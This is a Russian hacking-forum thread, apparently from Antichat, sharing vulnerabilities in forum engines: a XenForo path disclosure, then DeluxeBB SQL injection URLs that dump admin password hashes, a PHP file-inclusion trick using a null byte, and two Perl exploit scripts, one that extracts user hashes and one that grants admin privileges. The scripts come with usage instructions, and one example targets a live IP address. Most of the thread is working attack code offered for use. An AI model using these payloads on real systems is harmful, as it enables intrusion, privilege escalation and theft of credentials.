02.04.2015, 17:48
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
XenForo
Full Path Disclosure
fb_channel.php?l[]=1
PS: На античате тоже работало, но уже fixed
|
|
|
15.04.2007, 15:21
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: DeluxeBB
Версия: <= 1.06
Уязвимость в сценарие misc.php, из за недостаточной обработки данных в параметре name можно осуществить SQL инъекцию.
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+1,concat(database(),char(58),version(),char(58),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Пароль пользователя:
Код:
misc.php?sub=profile&name=0')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid=1/*
где uid= - номер пользователя
Эксплойт:
Код:
#!/usr/bin/perl
# coded by k1b0rg
use LWP::UserAgent;
use strict;
my $site=$ARGV[0];
my $id=$ARGV[1];
my $browser = LWP::UserAgent->new() or die;
my $res=$browser->get($site.'misc.php?sub=profile&name=0\')+UNION+SELECT+1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+deluxebb_users+where+uid='.$id.'/*');
if($res->content=~m!<font class="misctext">([a-f0-9]{32})</font>!i)
{
print 'Hash for userid='.$id.': ['.$1.']';
}
else
{
print 'Exploit failed.';
}
Использование эксплойта:
путь к эксплойту сайт и путь до форума номер пользователя
c:\expl.pl http://site.com/forum/ 1
Сайт и путь до форума писать слитно:
http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта
Резултат работы эксплойта - хеш (md5) пароля выбранного пользователя.
Пример уязвимости:
Код:
http://82.212.43.253/c_forum/misc.php?sub=profile&name=0')+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Уязвимость под относительно старые форумы - всетреить такие можно не часто, особенно если учесть что сами движки форумов не сильно распространены.
------------------------------------------------------------------
Форум: DeluxeBB
Версия: <= 1.06
Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.
Уязвимых сценариев несколько:
Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=[file]
http://site.com/templates/deluxe/posting.php?templatefolder=[file]
http://site.com/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://site.com/templates/default/postreply.php?templatefolder=[file]
http://site.com/templates/default/posting.php?templatefolder=[file]
http://site.com/templates/default/pm/newpm.php?templatefolder=[file]
При проверки узявимости
Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=123
вылезала ошибка из которой было видно что к строке добавляеться /posticons.php (т.е. в результате строка выглядела 123/posticons.php), что отлично исправляеться добавлением к строке %00, т.е. в результате запрос долже выглядить так:
Код:
http://site.com/templates/deluxe/postreply.php?templatefolder=[file]%00
Последний раз редактировалось Grey; 02.05.2008 в 13:45..
|
|
|
|
15.04.2007, 17:16
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: DeluxeBB
Версия: <= 1.07
Для этой версии есть эксплойт для получения админских привилегий.
Эксплойт:
Код:
#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# DeluxeBB <= 1.07 Create Admin Exploit #
# www.hackerz.ir - www.h4ckerz.com #
################### Coded By Hessam-x #####################
);
if (@ARGV < 3) {
print " # usage : hx.pl [host&path] [uname] [pass]\n";
print " # E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n";
exit();
}
print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";
print " [~] Login ... ";
# Login In DeluxeBB <= 1.07 Create Admin Exploit
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'misc.php',
Content => [
"sub" => "login",
"name" => "$uname",
"password" => "$passwd",
"submit" => "Log-in",
"redirect" => "",
"expiry" => "990090909",
],);
if($cookie_jar->as_string =~ /memberpw=(.*?);/) {
print "successfully .\n";
} else {
print "UNsuccessfully !\n";
print " [-] Can not Login In $host !\n";
print $cookie_jar->as_string;
exit();
}
# Creat Admin :)
$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0
&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=
English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12
&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) {
print " [+] You Are Admin Now !!";
} else {
print " [-] Exploit Failed !";
}
# milw0rm.com [2006-06-25]
Использование эксплойта:
путь к эксплойту сайт и путь до форума ваш логин ваш пароль
c:\expl.pl http://site.com/forum/ grey 123123
Сайт и путь до форума писать слитно:
http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта
Резултат работы эксплойта - получение админских привилегий.
------------------------------------------------------------------
Форум: DeluxeBB
Версия: <= 1.9
Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.
На этот раз уязвим сценарий sig.php.
PHP код:
<?php
if($settings['smilies']=='on')
{
include($templatefolder.'/smilies.php');
}
?>
Из кода видно что для инклюда необходимо вывполнение условия $settings['smilies']=='on', а так же наличие %00, т.к. к строке будет добавляться /smilies.php.
В результате:
Код:
http://site.com/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00
где [file] - файл, который будет инклюдиться, а settings[smilies]=on присвоение переменной необходимого для инклюда значения.
Последний раз редактировалось Grey; 02.05.2008 в 13:45..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
